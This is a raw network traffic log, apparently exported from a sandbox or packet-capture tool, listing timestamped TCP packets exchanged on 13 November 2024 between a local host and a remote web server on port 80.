                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242907047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242925882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242928982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242939949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242948055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242960930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242965937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242974043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242984056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.242988110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243004084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243016958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243026018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243041039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243047953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243055105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243066072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243093967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243243933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243288994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243295908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243304014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243320942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243330956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243411064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243419886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243428946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.243452072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247381926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247392893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247401953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247426033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247454882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247494936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247587919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247597933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247636080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247721910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247733116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247741938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247754097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247762918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247776031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247801065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247848988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247860909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247872114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247883081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247891903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247899055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247957945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247977018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.247989893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248029947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248188972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248207092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248215914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248225927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248240948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248246908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248255014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248259068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248270988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248281956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248302937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248315096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248392105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248404026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248413086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248434067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248505116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248516083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248524904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248544931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248548985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248567104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248656034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248667002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248677015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248687029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248696089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248697042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248718977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248733997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248914003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248925924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248935938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.248958111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249049902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249059916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249068975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249079943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249089956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249094009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249100924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249129057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249320030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249330997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249349117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249352932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249361038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249392986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249394894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249406099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249416113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249435902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249449968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249537945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249557018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249568939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249593973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249594927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249617100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249624968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249629974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249634027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249643087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249653101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249661922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249663115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249680996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249699116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249742031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249752998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249763012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249773026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249783039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249788046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249794006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249804020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249805927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249819040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249829054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249857903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249888897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249900103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249910116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249921083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249931097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249932051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249943972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249953985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249954939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.249984026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250000000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250010014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250020027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250030994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250040054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250041008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250055075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250062943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250085115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250252962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250263929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250274897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250294924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250313997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250340939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250351906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250360966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250371933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250380993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250401020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250490904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250502110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250511885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250521898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250531912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250541925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250550032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250554085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250565052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250576019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250576973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250591040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250745058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250792980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250801086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250804901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250814915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250834942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250890970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250922918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250960112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250972033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.250981092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251005888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251106024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251116991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251128912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251146078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251147985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251166105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251168966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251178980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251189947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251198053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251199007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251208067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251215935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251219988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251230955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251241922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251249075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251265049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251288891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251300097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251310110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251332998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251348972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251441002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251483917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251523018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251533985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251543999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251554966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251575947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251643896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251655102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251666069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251676083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251683950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251698971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251832008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251843929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251854897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251864910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251872063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251878023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251900911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.251923084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252059937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252070904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252082109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252090931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252101898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252104044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252116919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252126932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252135038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252146006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252154112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252155066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252167940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252187014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252194881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.252218962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.290864944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.290908098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.290981054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.290991068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291009903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291021109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291028023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291030884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291042089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291059971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291071892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291117907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291182041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291191101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291219950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291243076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291253090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291279078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291287899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291327953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291337013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291347027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291378021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291445017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291455030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291465044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291475058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291486025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291491032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291503906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291533947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291544914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291554928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291564941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291574001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291574955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291594028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291610956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291806936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.291817904 CET804973342.96.10.8192.168.2.4
